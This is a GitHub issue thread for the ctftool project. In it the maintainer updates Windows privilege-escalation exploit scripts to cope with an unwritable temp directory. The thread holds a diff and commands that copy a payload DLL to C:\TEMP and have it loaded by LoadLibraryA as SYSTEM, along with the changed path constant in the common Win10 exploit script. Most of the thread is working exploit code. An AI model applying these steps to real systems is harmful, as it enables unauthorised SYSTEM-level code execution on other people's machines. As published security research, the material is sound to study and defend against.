search

taviso / ctftool

Interactive CTF Exploration Tool
Apache License 2.0
1.64k stars 271 forks source link

handle unwritable temp dir #2

Closed taviso closed 5 years ago

taviso commented 5 years ago

A comment on twitter says that on some systems C:\Windows\Temp is not writable, but he got the exploit working using C:\Temp instead.

https://twitter.com/matteomalvica/status/1161378715663831040

I should probably handle this in my script.

taviso commented 5 years ago

I think I will just need to do

run CMD /C MKDIR C:\TEMP
run CMD /C COPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL

Then update the path accordingly, this thing in ctf-exploit-common-win10.ctf:

# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
set r2 0x5c504d45545c2e2e
taviso commented 5 years ago

Even easier:

run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

This seems to work, testing on a few VMs now:

diff --git a/scripts/ctf-consent-system.ctf b/scripts/ctf-consent-system.ctf
index ded81b7..fcc7a6e 100644
--- a/scripts/ctf-consent-system.ctf
+++ b/scripts/ctf-consent-system.ctf
@@ -5,14 +5,14 @@

 print Attempting to copy exploit payload...

-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

 # Print a warning if that didnt work.
 repeat rc print
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!! THIS EXPLOIT REQUIRES C:\TEMP\EXPLOIT.DLL TO EXIST !!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 repeat rc print

 print
diff --git a/scripts/ctf-exploit-common-win10.ctf b/scripts/ctf-exploit-common-win10.ctf
index 98af118..e06af18 100644
--- a/scripts/ctf-exploit-common-win10.ctf
+++ b/scripts/ctf-exploit-common-win10.ctf
@@ -420,7 +420,7 @@ repeat r1 callstub 0 0 r3
 print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...

 # And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
-set r2 0x5c504d45545c2e2e
+set r2 0x5c504d45545c3a43

 patch 0 0xa8 r0 8 -0x120
 set r1 r2
diff --git a/scripts/ctf-logonui-system.ctf b/scripts/ctf-logonui-system.ctf
index 5d28dcc..b2dca0d 100644
--- a/scripts/ctf-logonui-system.ctf
+++ b/scripts/ctf-logonui-system.ctf
@@ -5,8 +5,8 @@

 print Attempting to copy exploit payload...

-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

 # Print a warning if that didnt work.
 repeat rc print
taviso commented 5 years ago

Hmm OK, let's do it.

Maybe I should use C:\CTFTOOL, but I'll wait and see if anyone says this doesn't work first.

uf0o commented 5 years ago

as a note, the build where I have experienced the issue was 18362.267

niemand-sec commented 5 years ago

Yep, same issue in Windows 1607. I also fixed it by doing this https://github.com/taviso/ctftool/issues/2#issuecomment-521036097